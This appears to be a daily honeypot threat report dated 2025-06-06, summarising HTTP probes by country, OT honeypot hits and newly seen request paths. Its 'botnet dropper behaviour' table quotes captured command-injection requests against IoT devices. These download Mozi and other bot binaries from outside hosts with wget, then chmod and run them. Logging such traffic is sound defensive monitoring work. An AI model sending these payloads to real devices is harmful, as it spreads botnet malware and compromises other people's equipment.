Daily Report: 2025-06-06#
Executive summary#
interaction report on http service of various Hhoneypot around the world.
- Executive summary
- OT report simplified
- Botnet dropper behaviour
- List of request
- List of country_iso_code
executive_summary#
In today’s repport, we detected 6 stage 1 IP address(es), linked to 6 dropper URL(s).
There are 19 new requests that have never been observed before (these were added to the monitored request database.).
A total of 847 requests were recorded during the day, originating from 6 different countries, with a peak of 208 requests coming from US.
ot_simplified_report#
simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.
source_country | targeted_country |
---|---|
DE | Germany |
US | Germany |
BR | Germany |
US | Germany |
SG | Germany |
DE | Germany |
US | Dubai |
botnet_dropper_behaviour#
remote_addr | request |
---|---|
116.97.180.214 | GET /shell?cd+/tmp;rm+-rf+*;wget+ 45.153.34.62/jaws;sh+/tmp/jaws HTTP/1.1 |
45.115.89.82 | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0 |
103.207.125.92 | 27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0 |
117.199.229.195 | GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1 |
141.98.11.147 | POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20arm7%3Bkillall -9 arm7%3B%20wget%20http%3A%2F%2F94.26.90.251%2Farm7%3B%20chmod%20777%20%2A%3B%20.%2Farm7%20tbk HTTP/1.1 |
141.98.11.147 | pingAddr=%7cecho%20%24(cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F94.26.90.251%2Fmips%3B%20chmod%20777%20mips%3B%20.%2Fmips%20xpon)&wanif=130816 |
request#
The list of requests presented here are those that have not yet been yet integrated into the request database.
number_of_occurence | request | |
---|---|---|
32 | 3 | GET /userRpmNatDebugRpm26525557/start_art.html HTTP/1.1 |
41 | 3 | Get /login.asp HTTP/1.1 |
44 | 3 | POST /boaform/Ping6Config HTTP/1.1 |
116 | 1 | GET /Templates/LoginPage.html/env HTTP/1.0 |
133 | 1 | GET /wwwSiemens/actuator/env HTTP/1.1 |
147 | 1 | GET /XCmU HTTP/1.1 |
148 | 1 | GET /2bdd HTTP/1.1 |
171 | 1 | GET /Odin/http/call1749189596 HTTP/1.1 |
172 | 1 | GET /OdinHttpCall1749189596 HTTP/1.1 |
173 | 1 | GET /odinhttpcall1749189596 HTTP/1.1 |
190 | 1 | GET /php/login.php HTTP/1.1 |
222 | 1 | GET /Odin/http/call1749185871 HTTP/1.1 |
223 | 1 | GET /OdinHttpCall1749185871 HTTP/1.1 |
224 | 1 | GET /odinhttpcall1749185871 HTTP/1.1 |
238 | 1 | GET /php_info HTTP/1.1 |
275 | 1 | GET /FormLogin/env HTTP/1.1 |
288 | 1 | GET /FormLogin/actuator/env HTTP/1.1 |
289 | 1 | GET /Templates/LoginPage.html/actuator/env HTTP/1.0 |
290 | 1 | GET /wwwSiemens/env HTTP/1.1 |
country_iso_code#
number_of_occurence | country_iso_code | |
---|---|---|
0 | 208 | US |
1 | 145 | BG |
2 | 102 | DE |
3 | 85 | NL |
4 | 42 | JP |
5 | 34 | GB |
6 | 25 | LT |
7 | 20 | NG |
8 | 16 | SC |
9 | 15 | BD |
10 | 14 | PL |
11 | 11 | CA |
12 | 10 | GH |
13 | 10 | FR |
14 | 9 | UA |
15 | 8 | CH |
16 | 8 | SG |
17 | 7 | PT |
18 | 6 | IN |
19 | 6 | HK |
20 | 6 | KR |
21 | 6 | MX |
22 | 5 | ZA |
23 | 5 | VN |
24 | 5 | BE |
25 | 4 | TR |
26 | 4 | IL |
27 | 4 | ES |
28 | 4 | RU |
29 | 3 | ID |
30 | 3 | BR |
31 | 3 | KZ |
32 | 2 | BY |
33 | 2 | AO |
34 | 2 | KW |
35 | 2 | PA |
36 | 2 | IE |
37 | 1 | MC |
38 | 1 | IR |
39 | 1 | CN |
40 | 1 | DK |